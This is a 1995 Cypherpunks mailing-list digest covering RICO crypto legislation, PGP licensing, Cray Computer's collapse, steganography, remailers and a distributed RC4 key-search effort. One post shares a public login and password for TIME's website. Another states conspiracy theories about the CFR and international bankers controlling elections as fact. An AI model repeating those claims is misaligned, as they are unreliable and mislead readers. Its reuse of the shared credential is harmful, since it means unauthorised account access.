is a "Good Thing{tm}". -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMArjMjokqlyVGmCFAQHrdgP+NzpimLDgMY0/HMk8CVu4iaqmCdljxLLv +G6k3CkkiCvowLTEHv45NUaixWl38VgeMnp2vxOPVFcb5lEdHLd2DqXL4vj7sjg1 rWAIX4/Q+/KL98ATCw9+ePs+CFSM3HAkRWT6sNmmAJyHj6y13Yk3Fa9qY5Gt5kO3 8wqSPO2aOYE= =1ZOw -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From lmccarth at cs.umass.edu Mon Jul 17 15:28:00 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Mon, 17 Jul 95 15:28:00 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: <9507172227.AA09751@cs.umass.edu> Andrew Spring writes: > This wasn't really my point. Grassley's bill implies that uploading crypto > to an overseas FTP site would qualify as a predicate act, needed for a RICO > seizure. I think he is assuming that someone would do this for the > purposes of making money: and that anything bought with that money would be > RICOable. I don't think he or anyone else in Congress is aware that people > tend to do this stuff for free. I disagree. Sec. 1030A (a) under S.974 would make it illegal to "transfer unlicensed computer software," *"regardless of whether the transfer is performed for economic consideration"*. S.974 would make each such transfer a predicate act for RICO purposes. (this message is oddly formatted due to problems I'm having with my environment right now) -Futplex From asgaard at sos.sll.se Mon Jul 17 15:46:08 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Mon, 17 Jul 95 15:46:08 PDT Subject: Safford's Nemesis Message-ID: Kahn (1962) doesn't really explain why vital Magic intercepts and the 'winds' execute did not prevent the Pearl Harbour disaster. I just read 'Infamy' by John Toland (1982), containing 'proof' - very convincing, in my opinion - of the Pearl Harbour cover-up. The US president, selected members of his cabinette and a few admirals and generals knew - from Magic and the 'winds' execute, radio traffic analysis, diplomatic sources, double agents - exactly when and where the Japaneese were going to attack, but didn't warn Hawaii, fearing that too efficient counter-measures by the Oahu military might make the attack abort and so not convince the isolationists. The unexpected tactical capabilities of the Japaneese armada then made a cover-up all the more important. What has been revealed since? Are the views in Toland's book now 'official', established history, or what? Mats From jya at pipeline.com Mon Jul 17 16:07:04 1995 From: jya at pipeline.com (John Young) Date: Mon, 17 Jul 95 16:07:04 PDT Subject: OUT_law Message-ID: <199507172306.TAA12229@pipe2.nyc.pipeline.com> 7-17-95. W$Japer: "As Regulators Seek to Police Internet, An Offbeat Finnish Service Fights Back." (PW cited earlier.) The U.S. Congress and governments from Singapore to New Zealand are mulling new efforts to control the flow of material over the Internet. But from a barren storefront in Finland's capital, Johan Helsingius is doing everything he can to prevent this. He may well be winning the fight. JUF_pug "Louis Freeh's Golden-Boy Image Faces Scrutiny Over FBI's Role in Shootout." During his 23 months as director of the Federal Bureau of Investigation, Louis Freeh has generated the golden-boy image the FBI needed. Now , Mr. Freeh's judgment is open to more intense scrutiny ... raises the possibility of that dreaded Washington phenomenon: the coverup. REX_rug Zwei: OUT_law From terrell at sam.neosoft.com Mon Jul 17 16:32:53 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Mon, 17 Jul 95 16:32:53 PDT Subject: Root Causes Message-ID: <199507172337.SAA10144@sam.neosoft.com> > >From: Michael Froomkin >Jim didn't take my Con Law I course. > >In message <199507161819.OAA06090 at bb.hks.net> Jim Ray writes: >[cuts throughout] >> >> Amendment IX -- "The enumeration in the Constitution of certain rights >> shall not be construed to deny or disparage others retained by the people." > ^^^^^^^ >> [The right to write code was among many rights NOT enumerated.] >> > >Very hard to argue that the right to write code (as opposed to, >say, the right to write in code) existed in the late 18th >century; hence it is hard to argue that it could be "retained" >today. What about Jacquard loom cards? Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766 From tcmay at sensemedia.net Mon Jul 17 16:36:16 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 17 Jul 95 16:36:16 PDT Subject: Automated Rant Generators and Letter Generators Message-ID: At 7:29 PM 7/17/95, Harry Bartholomew wrote: >> >> Cypherpunks could probably have an effect on hastening this "denial of >> service" attack on the efficacy of letter-writing by releasing an >> easy-to-use package that does all this letter writing at the click of a >> button....just type in some key words, for the topics, and it does the >> rest. >> >> An interesting project, actually. >> >> --Tim May >> > A final step might be to interface the output to old pen plotters > like my HP7470A with an ascii-to-handwriting program. Akin to > the White House souvenir signature generator, but with a set of > parameters to mimic different "hands". Knuth's Metafont tricks > come to mind. By the way, I should first say that I have nothing against letter writing, and my comments about "hastening" a "denial of service" attack on letter-writing are mostly just out of general interest. Bart's comments about using Knuth's typographic work are interesting, to the extent that letters need to look handwritten. In the Mac market, it's possible to send in some handwriting samples and get back a font that emulates the handwriting! I don't think the pen plotter is actually needed--and few people would use it--as most faxes can be emulated with laser printers (due of course to the limited dots per inch resulution). In fact, most fax modems can directly fax from any screen that can produce printed output. So, the combination of handwriting fonts, automated rant generators (of varying rabidities), and fax capabilities gives a pretty good start. Using lots of handwriting samples, various other fonts, and a mix of styles in the letters will help. Anyway, where this all gets interesting is the following: * Can a kind of Turing Test be tried here? That is, in this limited domain of "letters to the editor/Congressmen," can a letter generator be implemented which generates letters effectively indistinguishable from letters and faxes generated by actual human beings? ("Effectively indistinguishable" in the sense that a human reader could not sort a set of letters into human- and machine-generated subsets with statistically significant certainty better than guessing). Of course this is also similar to the "style detectors" we so often talk about. The crypto relevance has to do with detecting patterns in letters and rants, in emulating these patterns, and (perhaps) in speeding up lobbying. (Though I agree that widespread adoption of automated letter-writing, such as the direct mail folks are already doing, will eventually just kill off letter writing as a means of lobbying.) This may also hasten the adoption, someday, of digital signatures. Congressmen and their aides may check incoming letters against databases of their consituents who have "registered" with them (lots of issues here). Merely counting the "yes" and "no" letters has long been problematic, as the Republicans have been leading in direct mail campaigns since at least the mid-70s (recall Richard Viguerie...). Increased automation will just make it even more obvious. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From bigdaddy at ccnet.com Mon Jul 17 17:23:06 1995 From: bigdaddy at ccnet.com (Le Dieu D'Informations Insensibles...) Date: Mon, 17 Jul 95 17:23:06 PDT Subject: ECM list. Message-ID: <199507180019.RAA22752@ccnet.ccnet.com> -----BEGIN PGP SIGNED MESSAGE----- >I'm also considering other strategies for gaining e$-- offering a service >on the DigiCash "cybershops" page, or just going to all my e-mail using >friends, showing them how to get their free e$100.00, and then begging them >to give me half of it. (Finder's fee? Friendly gift?) Why not offer an anonymous proxy of some kind for e-cash? You can charge per connect or per unit of time, simply to demonstrate the concept. The techniques developed for remailers(breaking up messages...accepting PGP- encrypted destinations...varying times...so on) could find an application here. If a chain could be constructed, it would help protect the identity of the user(assuming no collusion between operators). The problem is, as always, to write the code. Not to mention the ethical/possibly legal question of selling anonymity... Another possible service: selling gems of wisdom in pieces. Find or write a gem of wisdom...taking into account copyright laws and so forth. Then set up a storefront via telnet or http...a sort of kiosk. Customers can then buy secrets or portions of secrets...or percentages. Use a secret splitting algorithm to allow people to 'split the cost' of a secret and then get in touch with each other through anonymous remailers set up for that purpose by your kiosk. Depending on the information you're selling(whether it be the secret key for BlackNet or simply the contents of your CD collection), you could earn some e-cash this way. An all-or-nothing-disclosure-of-secrets protocol might also come in handy. Again, the problem is sitting down and writing the code. Has anyone made any significant efforts toward either of these yet, with or without CD$? David Molnar -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMApx1+FDHpuTkgoVAQEo/Af/cmZPKI1Uk/hFbTwuQwcZbDagnAHpZkqZ WdJMUe/4RxOymB5mnfvM7bl4S4x5BrUJJ6mepQwq0/39PiJRWAJFJFnhuZoIin5o I5KCOTNQMVNdJLL7iTtZJEqrIEGhfq2lrRpbyc1wPGj+9l7tWlSfTXLl+E0z6MtZ OWEJ0mzP4eG5TQJEtObAqD5QYOhHngEN96NMYDUv6gYzZROx3zovYqrFFrJt8zr1 HkxZzpA/rGHdoCAeViLAqO42o18zRvu8j0i7VIXI/rx6rOQ6gCDs4tgjMH1BSQH4 3rMfxb0KB8Vlmd1AL1OzvhRSy9cbBvdX2D+iOC7sZQ755JBRwJKd2Q== =9YVg -----END PGP SIGNATURE----- lo...look to the sig, for there will be no sign From jgrubs at voxbox.norden1.com Mon Jul 17 17:34:45 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Mon, 17 Jul 95 17:34:45 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up Message-ID: -----BEGIN PGP SIGNED MESSAGE----- mpd at netcom.com (Mike Duvos) writes: > > > What's CFR? > Code of Federal Regulations? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAr8cN74r4kaz3mVAQFZUgP+K/tIieWM1meiSWMfveLeF/LTLc1oLTp/ IftfXZokadfbh9RMvSXfiJvCVHZS/mRa33KG+SCNjt+K0yLWi7JrYFEmepGxFlVn NjcrZdM+lFfNc03ksgOlccZg+o7GlzBNUW3s7yN2/Y2aRss22mfJkhtWvfaqDs7h mYT4tONtNSQ= =Zp8i -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From jgrubs at voxbox.norden1.com Mon Jul 17 17:34:51 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Mon, 17 Jul 95 17:34:51 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- tim werner writes: > Hi, > > I was reading in some Where to Get PGP Web page that "PGP2.6.2 is legal > to use in the U.S. for non-commercial purposes (i.e., you cannot sell it > or the functionality it provides)". Can anyone on the list say whether > this is true? That is, was the use of "i.e." correct, or should it have > been "e.g."? > > Or, to put it more succinctly, I was talking to one of the sys admins at > A-B, and he said that we weren't allowed to use PGP to encrypt our mail, > because Viacrypt owned the commercial rights. But, according to the bit > I quoted, it would only be a violation if A-B tried to put PGP into one > of their products. > > Has anyone heard a (hopefully legal, but I'll listen to anyone's > opinion) answer to this? As I recall, the following is a correct scenario: a customer can use PGP to send credit card numbers to a vendor he's making a personal purchase from, but the vendor must use Viacrypt. If the customer is buying something to use for business, BOTH must use Viacrypt. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAr+Ut74r4kaz3mVAQFMqwP8CgTKl3QetW+vn/A4TqJE2BrTEstM8fuw 2ZrmDZjHbZwISPtgbtwesup+wqknc9ECQwNKoyqbg5vYtK6Zd2tLVrD9gs7suA2F BEJeBNNMoGDPBh6Ep4alwtK6JpSt+e+AMTimRQCml+sf/md0GM6UovR1ZufQBTog +jLDu9KNRSg= =MCgA -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From jgrubs at voxbox.norden1.com Mon Jul 17 17:34:56 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Mon, 17 Jul 95 17:34:56 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Andrew.Spring at ping.be (Andrew Spring) writes: > So I'm wondering who this RICO stuff applies to. The guy who wrote it and > uploaded it to an FTP site? He's not profiting. The guy who uses it? He > didn't commit the predicate act. Who? It doesn't matter. Even if they say "Oops, sorry" later, the best you can hope for is to get your computer returned as a bushel basket full of junk parts. More likely it'll end up in some police station with "D.A.R.E." painted all over it. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAsAMt74r4kaz3mVAQHtygP+Ou3wJB68ECFzanKNO7l4AIqtZfApNA1z jZNatwmBZGOnQbC6LSQi5La5lws+U/yUs40hW8ZBVwG0/qUGH4RUra57Ubrtya+e B8vz9/Vnou8a5DkW4fSsL+eiNeJimKiFAguUQSdex3gJShjXIpVk/++3AKvEVy6h q43kUVG9irM= =VWRM -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From ab411 at detroit.freenet.org Mon Jul 17 17:59:58 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Mon, 17 Jul 95 17:59:58 PDT Subject: TIME pathfinder registration Message-ID: <199507180059.UAA12182@detroit.freenet.org> Will Kinney writes: >> I note someone has used "cypherpunks" as a login for TIME Mag's >> WWW service. ... If so, what's the password? > >This was me. The password is "writecode", since Pathfinder didn't allow >the login and password to be the same. Perhaps in the future people might use "sknuprehpyc" in such cases? And of course, don't put the list's email address in. -- David R. Conrad, ab411 at detroit.freenet.org, http://web.grfn.org/~conrad/ Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From werner at mc.ab.com Mon Jul 17 18:10:02 1995 From: werner at mc.ab.com (tim werner) Date: Mon, 17 Jul 95 18:10:02 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <9507180107.AA03586@mondo.ab.com> >Date: Mon, 17 Jul 1995 16:15:10 -0400 >From: tim werner >... I was talking to one of the sys admins at >A-B, and he said that we weren't allowed to use PGP to encrypt our mail, >because Viacrypt owned the commercial rights. I should have mentioned that I have no problem with people trying to make money. However, it turns out that ViaCrypt is not selling site-licenses, or even floating licenses, so they actually want to sell a separate copy for every user that will use it. As it happens, the aforementioned sys admin had purchased 5 licenses, to take care of the 2 users he already knew about, and figuring that there would probably be a couple more wanting to jump on the bandwagon. He offered to let me use one of the licenses, but there's no way I can go and tell my users "we have PGP", if I can't tell everyone that they can do it. And, there's no way I can see convincing my boss that we need that many copies of ViaCrypt, just so everyone in my department can encrypt their email traffic. Of course, I realize that none of the above changes the legality. thanks, tw -- Well, Bust My Britches! Eggs Almondine and a Bottle of Beaujolais! From dan at milliways.org Mon Jul 17 18:22:28 1995 From: dan at milliways.org (Dan Bailey) Date: Mon, 17 Jul 95 18:22:28 PDT Subject: RC4 crack Message-ID: <199507180122.AA21067@ibm.net> On Mon, 17 Jul 95 21:36:45 +0100 you wrote: > >Yep a telnet port is it for both reporting and getting keys, also the >WWW interface to the same. > >> I'd basicly like to be able to start the program, nice it, slam it >> in the background, and forget about it. > >Adam > Is there an easy way to integrate machines who are not on-net 24-7 into this protocol? Not all of us have dedicated lines.:) Dan Bailey ****************************************************************************** Vote Speaker Newt Gingrich for President!! Dan Bailey Worcester Polytechnic Institute, class of 1997. merzbow at ibm.net ****************************************************************************** From pgf at tyrell.net Mon Jul 17 20:37:08 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 17 Jul 95 20:37:08 PDT Subject: Cray Computer liquidating... Message-ID: <199507180332.AA24106@tyrell.net> According to a flier from an e-mail list I'm currently unwillingly subscribed to, Cray Computer is going out of business. Any comments and/or crypto relevance? Phil From hal9001 at panix.com Mon Jul 17 20:51:42 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Mon, 17 Jul 95 20:51:42 PDT Subject: WSJ on remailers... Message-ID: At 14:00 7/17/95, Peter Wayner wrote: >The WSJ has a article on anonymous remailers buried in the B section. It >is pretty straightforward and ends up quoting some Finnish police officer >saying that they're not going to go raiding remailers on any suspicion. >They'll need a real crime. That Finnish comment is probably due to the fall-out/flap from their raid on anon.penet.fi in the CoS case. From tcmay at sensemedia.net Mon Jul 17 21:29:05 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 17 Jul 95 21:29:05 PDT Subject: Cray Computer liquidating... Message-ID: At 3:32 AM 7/18/95, Phil Fraering wrote: >According to a flier from an e-mail list I'm currently >unwillingly subscribed to, Cray Computer is going out >of business. > >Any comments and/or crypto relevance? This is Cray Computer, not the older Cray Research. Cray Computer was developing a GaAs-based computer that used advanced robotic assembly/packaging. Cray Research spun off the project, led by founder Seymour Cray, and the two companies were wholly separate. Cray Research remained in Minnesota, while Cray Computer was located in Colorado Springs. The split was largely arranged because Cray Research was unwilling or unable to fund both the conventional supercomputer lines _and_ the more experimental machines favored by Seymour Cray. So they let Seymour and the technology split off, and a stock distribution was arranged (I was a shareholder of Cray Research at the time, and recall the distribution). Cray Research is continuing to sell "Crays," including successors of the original Cray line and various multiprocessor machines based on the Sparc processor. Cray Computer was trying to find customers for its Cray 3 and (planned) Cray 4. The saga of the collapse of Cray Computer has been going on for the past year or so, with the last several months being the final chance to reorganize the company and keep it going. They failed, apparently, and now the final liquidation of assets is about to happen. Why didn't the Agency bail them out? Not clear, but my guess is that the advanced _process_ technology of Cray Computer was not so exciting to the NSA. The "attack of the killer micros," to use Eugene Miya's phrasing, is wiping out most conventional advanced processor attempts to get supercomputer speed. When a single piece of CMOS silicon gets 200-500 MIPS, and a bunch of them can be put together, it gets pretty hard to justify hyper-expensive GaAs or Josephson Junction or whatever technologies. Sad for Seymour Cray, especially as he'd been pumping some of his own fortune into keeping Cray Computer going, but its the nature of business. And he'll bounce back, or take a well-deserved retirement. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From thresher!thad at netcom.com Mon Jul 17 21:30:29 1995 From: thresher!thad at netcom.com (Thaddeus J. Beier) Date: Mon, 17 Jul 95 21:30:29 PDT Subject: Cray Computer liquidating... Message-ID: <199507180423.VAA01942@thresher> Phil Fraerling asks if there is any crypto relevance to CCC liquidating. There definately is some. They were in the middle of building a Cray 3 with .25 Million PIM processors for the NSA. It was a wild machine, basically it used the Cray to pass data back and forth very quickly among the 1 bit processors. Someone who worked on it said that it reminded him of Wayner's hypothetical DES cracking machine. It was never very close to being finished. It will be interesting to see if somebody tries to finish it, or if they use some other platform to use the PIM (processor-in-memory) chips. I'd love to see who bids for the half-finished machine at the coming liquidation... thad -- Thaddeus Beier email: thresher!thad at netcom.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From bailey at computek.net Mon Jul 17 21:35:10 1995 From: bailey at computek.net (Mike Bailey) Date: Mon, 17 Jul 95 21:35:10 PDT Subject: Deployment In-Reply-To: <199507170827.BAA12427@ix6.ix.netcom.com> Message-ID: On Mon, 17 Jul 1995, Bill Stewart wrote: > > > So, anyone want to volunteer to port Privtool to Windows ? > > Uh, pardon my ignorance, but what is privtool, and why is it > > a good thing to port it to windows? > > (As compared to the task of integrating PGP into microsofts > > mail tool.) > > It's an open-system mail tool resembling Sun's mailtool with PGP support added. > Open-system tools are one of those vanguard things :-) > (So are convenient GUI-development tools.) > I no longer have a nearby Sun machine to play on, so I haven't played with it, > but if it's got a well-done interface it's worth porting or stealing concepts > from to include in other systems. I've heard that Microsoft's new mail tools > are far less brain-damaged than the Microsoft Mail I've grown to know and hate, > which assumes any message that's more than a few lines will be an attached > document with maybe some optional intro and leftover mail headers, > and chokes on messages with more than 30K of text in the body (choking badly > on more than 64K). (Apparently, part of the reason for this evil is the fault > of Visual Basic and/or Visual C++, which are convenient GUI development > tools...) > > On the other hand, integrating it into Free Eudora for Windows would be > pleasant, > if that's doable (I forget it source is available.) > # Thanks; Bill > # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com Does Privtool support POP3 ?? -Mike ************************************************************************** * * * Mike Bailey (hm)214-252-3915 * * AT&T Capital Corporation. (wk)214-456-4510 * * email bailey at computek.net host bambam.computek.net * * * * "Remember you can tune a piano but you can't tuna fish -Joe Walsh" * * http://www.computek.net/public/bailey/ * ************************************************************************** From attila at PrimeNet.Com Mon Jul 17 21:44:44 1995 From: attila at PrimeNet.Com (attila) Date: Mon, 17 Jul 95 21:44:44 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up In-Reply-To: <9507171938.AA03018@mondo.ab.com> Message-ID: CFR = Council on Foreign Relations which consists of two levels of membership, about 3000 in the lower level and 500 in the "secret" inner sanctum. you can not ask to jihn the CFR, you are asked. There are minutes of the meetings, nor are guests welcome. The membership includes bankers (big time bankers only), powerful politicians, but the bulk of the membership is made of the OLD money crowd,,, Harvard (Delphi, Fly, Phoenix, etc) and Yale (Skull and Bones). This is where the power in America "sleeps" and controls US policy, who is going to be elected, etc. For instance: both Clinton and Bush are members. A second similar organization is the Tri-Lateral commission which has been dominated and funded by David Rockefeller (Chairman of Chase Manhatten Bank). There is a great deal of "selective" overlap in the two memberships. and, there is an even more select and far more secret top level at the global lever: The Bilderburgers --it's secret enough that nonone knows the total membership. there are others such as Baron de Rothchild's bankers group which includes the central bank chairmen of all the major countries which have semi-automonous central banks like our Federal Reserve. This group is ultimately the most dangerous since they have the power to print money --funny money when their respective governments need a little debt financing. -----------------original --------------------- On Mon, 17 Jul 1995, tim werner wrote: > >Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT) > >From: attila > > >and, conspiracy theories non-withstanding, we the people do not govern > >America --we are only given a short list of politicians who have sold > >their soul to CFR's satanist inner circle. > > What's CFR? > > > tw > > -- > > Well, Bust My Britches! Eggs Almondine and a Bottle of Beaujolais! > -- Ask not what your country can do for you. Do it yourself! ____________________________________________________________________________ #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0-================================------------------- | but, the sword sure as hell is faster.... "If I wanted your opinion, I would have asked for it -in triplicate" --attila ____________________________________________________________________________ From mark at unicorn.com Mon Jul 17 22:06:12 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Mon, 17 Jul 95 22:06:12 PDT Subject: RC4 crack Message-ID: On Mon, 17 Jul 1995 aba at dcs.exeter.ac.uk wrote: > The problem with nicing is that most unix schedulers don't seem to > know what nice means,.. you still get a noticable slow down on > interactive jobs on SGI boxes even if you've got it npri -h 150, and > even though the bruterc4 (and the bruteSSL too) have tiny resident > core sizes). Nice -19 works great on SunOS, it sits there happily eating up just about all the unused CPU time and doesn't interfere at all with interactive use. I guess it's the SYSV (ack) machines that have problems, 'cause the scheduler's too sophisticated. Mark From anon-remailer at utopia.hacktic.nl Mon Jul 17 22:45:09 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 17 Jul 95 22:45:09 PDT Subject: Zimmerman legal fund Message-ID: <199507180545.HAA13402@utopia.hacktic.nl> I just received a bit of mail asking about the Zimmermann Legal Defense Fund, which, like many folks out there, I support. The writer implied that he might give money because I suggest it in my sig, but expressed questions about its legitamacy, and questioned if it's "just someone trying to exploit the Zimmerman case" Could someone in the know talk about the relationship between FV and the ZLDF? I don't like to spread misinformation, so I won't answer based on conjectures. From lmccarth at cs.umass.edu Mon Jul 17 22:47:11 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Mon, 17 Jul 95 22:47:11 PDT Subject: Stego Standards Silly ? ( In-Reply-To: <8AD5238.000300015F.uuout@famend.com> Message-ID: <9507171402.AA22064@cs.umass.edu> Monster at FAmend.Com writes: > Not obvious at all. You encrypt and sign as usual, stego the resultant > output, and perhaps include in the stego routines some kind of CRC or > hash if you like. But the point is that the signature still works to > indicate whether the message was tampered with or not. > > If we posit a MITM, he can tamper with cyphertext =or= stegotext, but > he can't defeat the signature. I would recieve a GIF which my stego > software would turn into a file that PGP would puke on, telling me that > Someone Is Messing With My Mail. Sure -- for most message passing applications, tampering in transit would also lead to noticeably corrupted cleartext, when the stegoed ciphertext is decrypted. Again, PGP pukes, or perhaps Stealth PGP gives me something obliterated when it decrypts. See my comments below, however. > I would not, of course, be able to reveal this fact directly. However, > I could ask my correspondent to re-send the GIF, and when it comes out > different in EVERY SINGLE LSB, I have proof of tampering. Well, you could do that regardless of what is or isn't stegoed into the carrier image. I'm arguing that perhaps the govt. (or whomever) will be far less sympathetic to such in-stego-channel evidence of doctoring. I still see an obstacle to this approach, though. If we want to try to foil traffic analysis, then we need people routinely to dispatch ghost messages. Some of these should go to people with whom the sender is not trying to communicate. When Karen gets a GIF in the mail, she needs to decide whether its LSBs are significant (semantically speaking :) or not. If they decrypt into something meaningful, QED; if not, what to do ? "Sufficiently advanced communication is indistinguishable from noise" is a double-edged sword, after all. Establishing that communication is really being attempted is trickier under these conditions. I think I need to clarify my threat model. I'm positing a scenario in which transmission of ciphertext and stegoed anything is illegal, but transmission and use of "conspicuous" digital signatures is legal. Furthermore, the govt. sanitizes the LSBs of digital images for our protection, perhaps distorting a mean of X% of the LSBs of a mean of Y% of transmitted images. Out-of-stego- channel checksummation would IMHO be crucial in such a situation. -Futplex "A kiss and a hug and a couple of f*cks: being in love really sucks" -Meryn Cadell From greg at ideath.goldenbear.com Mon Jul 17 23:27:24 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Mon, 17 Jul 95 23:27:24 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <199507180522.AA01543@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- To: danisch at ida.uka.de Hadmut Danisch writes: >I am not familiar with american laws and have two questions: >1. If the bill becomes law, how can someone who violates it be >punished? A criminal RICO violation can be punished by up to 20 years' imprisonment, as well as forfeiture of any personal or real property constituting or derived from proceeds of racketeering activity. A convicted RICO defendant can be fined up to twice the gross profits of the racketeering activity. If the defendant disposes of property otherwise subject to forfeiture, other property owned by the defendant (of equivalent value) may be seized and forfeited. 18 USC 1963. RICO also allows private parties injured by a RICO violation to bring a civil suit and recover three times their actual damages, plus attorneys' fees and costs. A criminal conviction will operate to estop a RICO defendant from denying the facts underlying the criminal conviction in a subsequent civil suit. 18 USC 1964. >2. Does someone who publishes software which encodes or encrypts >(ASCII is a code, isn't it?) have to prove that he has provided the >universal decoder to the state or does the state have to prove that he >didn't do? The defendant has to prove that s/he provided the decoder, because providing the decoder is an affirmative defense. That puts the burden of proof on the defendant on that issue. Were the statute worded that not providing the decoder were an element of the crime, then the government would need to prove that the defendant hadn't provided it. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAtEm33YhjZY3fMNAQF/DQP/QOT1ZvMG/sCU2QnPpZVhHkAZrZf0R1AU 63QmxQTOZJvqhyvS70zrNmhW6mpXshQRpehQtMuUPDh7vtLS/FMatKaJc3yA+RXC 3vzLz3XNooOfM0fV6yIeVpZC5Nw5iMmyb/IwoVHLvAu7zYoGUi/sLoCW2s9xFa3M BmJkUL+/RaY= =fAVx -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Mon Jul 17 23:27:27 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Mon, 17 Jul 95 23:27:27 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <199507180523.AA01552@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- To: Andrew.Spring at ping.be Andrew Spring writes: >So I'm wondering who this RICO stuff applies to. The guy who wrote it and >uploaded it to an FTP site? He's not profiting. The guy who uses it? He >didn't commit the predicate act. Who? RICO does not require that either the enterprise or the predicate acts were motivated by (hope of) economic gain. _National Organization for Women v. Scheidler_, 114 S.Ct. 798, 127 L.Ed.2d 99 (1994) or ftp://ftp.cwru.edu/hermes/ascii/92-780.ZO.filt Looks like Bob Dornan wants to change that, though (probably because RICO was used to sue anti-abortion terrorists). He introduced HR 230 which would amend 18 USC 1961(5) to require "profit-seeking purpose" to establish a RICO "enterprise". THOMAS says that HR 230 is in the House Judiciary Committee. RICO is at http://www.law.cornell.edu:80/uscode/18/ch96.html et seq :) for the curious. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAtASn3YhjZY3fMNAQFZ+AP/VLcDCikMkzT8iA/AmdpKvWpSc/nOybma /6KCnVgOms7+g+MNnJZHQFzjxV2oMjtXSZD1/0ZQeeuZcJGZDqR1tbwj93JNfRjW LsNHB9d5xXk9xxbvJwY+TJgCGeZtp7Yb38yVt2MRGioyl5TDPFNOYTbSPr2t0TCr 0k4aeV81Mq0= =m5jT -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Mon Jul 17 23:51:20 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:51:20 PDT Subject: Here it is; bi-directional dining cryptographers Message-ID: <199507180649.XAA25418@ix3.ix.netcom.com> Context: Bidirectional DCnets, Alice and Bob simultaneously transmitting to each other. Interesting approach, though you do have to schedule it somehow. It's a different take on the uses of DCnets - the original was for an anonymous-1 to many rather than a 1 to 1 with only the two participants knowing, though in the first case the recipient can be known only to the sender if they want to arrange things that way through shared secrets or whatever. At 01:31 PM 7/17/95 +0100, Rev. Mark Grant wrote: >Yes, but presumably it's expected that they would be using secure >encryption on the messages that they're sending. That might still provide >some information about the message for traffic analysis, e.g. if you send >a PGP message you have your key-id at the beginning, and if you knew the >keys of 